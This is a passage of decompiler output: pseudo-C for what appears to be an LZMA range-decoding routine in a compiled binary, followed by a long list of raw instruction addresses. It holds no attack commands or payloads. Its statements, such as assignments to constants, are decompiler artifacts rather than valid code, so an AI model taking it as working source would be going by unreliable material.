												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                                                                                                        0x00000000
                                                                                                        0x004063d0
                                                                                                        0x004063d0
                                                                                                        0x004063d4
                                                                                                        0x004063f5
                                                                                                        0x004063fc
                                                                                                        0x00406402
                                                                                                        0x00406408
                                                                                                        0x0040641a
                                                                                                        0x00406420
                                                                                                        0x00406425
                                                                                                        0x00000000
                                                                                                        0x004063d6
                                                                                                        0x004063dc
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067ee
                                                                                                        0x004067f2
                                                                                                        0x004069a1
                                                                                                        0x004069b7
                                                                                                        0x004069bf
                                                                                                        0x004069c6
                                                                                                        0x004069c8
                                                                                                        0x004069cf
                                                                                                        0x004069d3
                                                                                                        0x004069d3
                                                                                                        0x004067fe
                                                                                                        0x00406805
                                                                                                        0x0040680d
                                                                                                        0x00406810
                                                                                                        0x00406813
                                                                                                        0x00406813
                                                                                                        0x00406819
                                                                                                        0x00406819
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fb5
                                                                                                        0x00405fbe
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fc4
                                                                                                        0x00000000
                                                                                                        0x00405fcf
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fd8
                                                                                                        0x00405fdb
                                                                                                        0x00405fde
                                                                                                        0x00405fe2
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405fe8
                                                                                                        0x00405feb
                                                                                                        0x00405fed
                                                                                                        0x00405fee
                                                                                                        0x00405ff1
                                                                                                        0x00405ff3
                                                                                                        0x00405ff4
                                                                                                        0x00405ff6
                                                                                                        0x00405ff9
                                                                                                        0x00405ffe
                                                                                                        0x00406003
                                                                                                        0x0040600c
                                                                                                        0x0040601f
                                                                                                        0x00406022
                                                                                                        0x0040602e
                                                                                                        0x00406056
                                                                                                        0x00406058
                                                                                                        0x00406066
                                                                                                        0x00406066
                                                                                                        0x0040606a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x0040605a
                                                                                                        0x0040605d
                                                                                                        0x0040605e
                                                                                                        0x0040605e
                                                                                                        0x00000000
                                                                                                        0x0040605a
                                                                                                        0x00406034
                                                                                                        0x00406039
                                                                                                        0x00406039
                                                                                                        0x00406042
                                                                                                        0x0040604a
                                                                                                        0x0040604d
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406053
                                                                                                        0x00000000
                                                                                                        0x00406070
                                                                                                        0x00406070
                                                                                                        0x00406074
                                                                                                        0x00406920
                                                                                                        0x00000000
                                                                                                        0x00406920
                                                                                                        0x0040607d
                                                                                                        0x0040608d
                                                                                                        0x00406090
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406093
                                                                                                        0x00406096
                                                                                                        0x0040609a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040609c
                                                                                                        0x004060a2
                                                                                                        0x004060cc
                                                                                                        0x004060d2
                                                                                                        0x004060d9
                                                                                                        0x00000000
                                                                                                        0x004060d9
                                                                                                        0x004060a8
                                                                                                        0x004060ab
                                                                                                        0x004060b0
                                                                                                        0x004060b0
                                                                                                        0x004060bb
                                                                                                        0x004060c3
                                                                                                        0x004060c6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040610b
                                                                                                        0x00406111
                                                                                                        0x00406114
                                                                                                        0x00406121
                                                                                                        0x00406129
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060e0
                                                                                                        0x004060e0
                                                                                                        0x004060e4
                                                                                                        0x0040692f
                                                                                                        0x00000000
                                                                                                        0x0040692f
                                                                                                        0x004060f0
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fb
                                                                                                        0x004060fe
                                                                                                        0x00406101
                                                                                                        0x00406104
                                                                                                        0x00406109
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004067a0
                                                                                                        0x004067a0
                                                                                                        0x004067a6
                                                                                                        0x004067ac
                                                                                                        0x004067b2
                                                                                                        0x004067cc
                                                                                                        0x004067cf
                                                                                                        0x004067d5
                                                                                                        0x004067e0
                                                                                                        0x004067e2
                                                                                                        0x004067b4
                                                                                                        0x004067b4
                                                                                                        0x004067c3
                                                                                                        0x004067c7
                                                                                                        0x004067c7
                                                                                                        0x004067ec
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406131
                                                                                                        0x00406133
                                                                                                        0x00406136
                                                                                                        0x004061a7
                                                                                                        0x004061aa
                                                                                                        0x004061ad
                                                                                                        0x004061b4
                                                                                                        0x004061be
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00406138
                                                                                                        0x0040613c
                                                                                                        0x0040613f
                                                                                                        0x00406141
                                                                                                        0x00406144
                                                                                                        0x00406147
                                                                                                        0x00406149
                                                                                                        0x0040614c
                                                                                                        0x0040614e
                                                                                                        0x00406153
                                                                                                        0x00406156
                                                                                                        0x00406159
                                                                                                        0x0040615d
                                                                                                        0x00406164
                                                                                                        0x00406167
                                                                                                        0x0040616e
                                                                                                        0x00406172
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x0040617a
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406174
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x00406169
                                                                                                        0x0040617e
                                                                                                        0x00406181
                                                                                                        0x0040619f
                                                                                                        0x004061a1
                                                                                                        0x00000000
                                                                                                        0x00406183
                                                                                                        0x00406183
                                                                                                        0x00406186
                                                                                                        0x00406189
                                                                                                        0x0040618c
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x0040618e
                                                                                                        0x00406191
                                                                                                        0x00406194
                                                                                                        0x00406196
                                                                                                        0x00406197
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x0040619a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040643a
                                                                                                        0x0040643e
                                                                                                        0x00406461
                                                                                                        0x00406464
                                                                                                        0x00406467
                                                                                                        0x00406471
                                                                                                        0x00406440
                                                                                                        0x00406440
                                                                                                        0x00406443
                                                                                                        0x00406446
                                                                                                        0x00406449
                                                                                                        0x00406456
                                                                                                        0x00406459
                                                                                                        0x00406459
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040647d
                                                                                                        0x00406481
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406487
                                                                                                        0x0040648b
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406491
                                                                                                        0x00406493
                                                                                                        0x00406497
                                                                                                        0x00406497
                                                                                                        0x0040649a
                                                                                                        0x0040649e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004064ee
                                                                                                        0x004064f2
                                                                                                        0x004064f9
                                                                                                        0x004064fc
                                                                                                        0x004064ff
                                                                                                        0x00406509
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x00000000
                                                                                                        0x0040679d
                                                                                                        0x0040679d
                                                                                                        0x004064f4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406515
                                                                                                        0x00406519
                                                                                                        0x00406520
                                                                                                        0x00406523
                                                                                                        0x00406526
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x0040651b
                                                                                                        0x00406529
                                                                                                        0x0040652c
                                                                                                        0x0040652f
                                                                                                        0x0040652f
                                                                                                        0x00406532
                                                                                                        0x00406535
                                                                                                        0x00406538
                                                                                                        0x00406538
                                                                                                        0x0040653b
                                                                                                        0x00406542
                                                                                                        0x00406547
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004065d5
                                                                                                        0x004065d5
                                                                                                        0x004065d9
                                                                                                        0x00406977
                                                                                                        0x00000000
                                                                                                        0x00406977
                                                                                                        0x004065df
                                                                                                        0x004065e2
                                                                                                        0x004065e5
                                                                                                        0x004065e9
                                                                                                        0x004065ec
                                                                                                        0x004065f2
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f4
                                                                                                        0x004065f7
                                                                                                        0x004065fa
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061ca
                                                                                                        0x004061ca
                                                                                                        0x004061ce
                                                                                                        0x0040693b
                                                                                                        0x00000000
                                                                                                        0x0040693b
                                                                                                        0x004061d4
                                                                                                        0x004061d7
                                                                                                        0x004061da
                                                                                                        0x004061de
                                                                                                        0x004061e1
                                                                                                        0x004061e7
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061e9
                                                                                                        0x004061ec
                                                                                                        0x004061ef
                                                                                                        0x004061ef
                                                                                                        0x004061f2
                                                                                                        0x004061f5
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004061fb
                                                                                                        0x00406201
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406207
                                                                                                        0x00406207
                                                                                                        0x0040620b
                                                                                                        0x0040620e
                                                                                                        0x00406211
                                                                                                        0x00406214
                                                                                                        0x00406217
                                                                                                        0x00406218
                                                                                                        0x0040621b
                                                                                                        0x0040621d
                                                                                                        0x00406223
                                                                                                        0x00406226
                                                                                                        0x00406229
                                                                                                        0x0040622c
                                                                                                        0x0040622f
                                                                                                        0x00406232
                                                                                                        0x00406235
                                                                                                        0x00406251
                                                                                                        0x00406254
                                                                                                        0x00406257
                                                                                                        0x0040625a
                                                                                                        0x00406261
                                                                                                        0x00406265
                                                                                                        0x00406267
                                                                                                        0x0040626b
                                                                                                        0x00406237
                                                                                                        0x00406237
                                                                                                        0x0040623b
                                                                                                        0x00406243
                                                                                                        0x00406248
                                                                                                        0x0040624a
                                                                                                        0x0040624c
                                                                                                        0x0040624c
                                                                                                        0x0040626e
                                                                                                        0x00406275
                                                                                                        0x00406278
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x0040627e
                                                                                                        0x00000000
                                                                                                        0x00406283
                                                                                                        0x00406283
                                                                                                        0x00406287
                                                                                                        0x00406947
                                                                                                        0x00000000
                                                                                                        0x00406947
                                                                                                        0x0040628d
                                                                                                        0x00406290
                                                                                                        0x00406293
                                                                                                        0x00406297
                                                                                                        0x0040629a
                                                                                                        0x004062a0
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a2
                                                                                                        0x004062a5
                                                                                                        0x004062a8
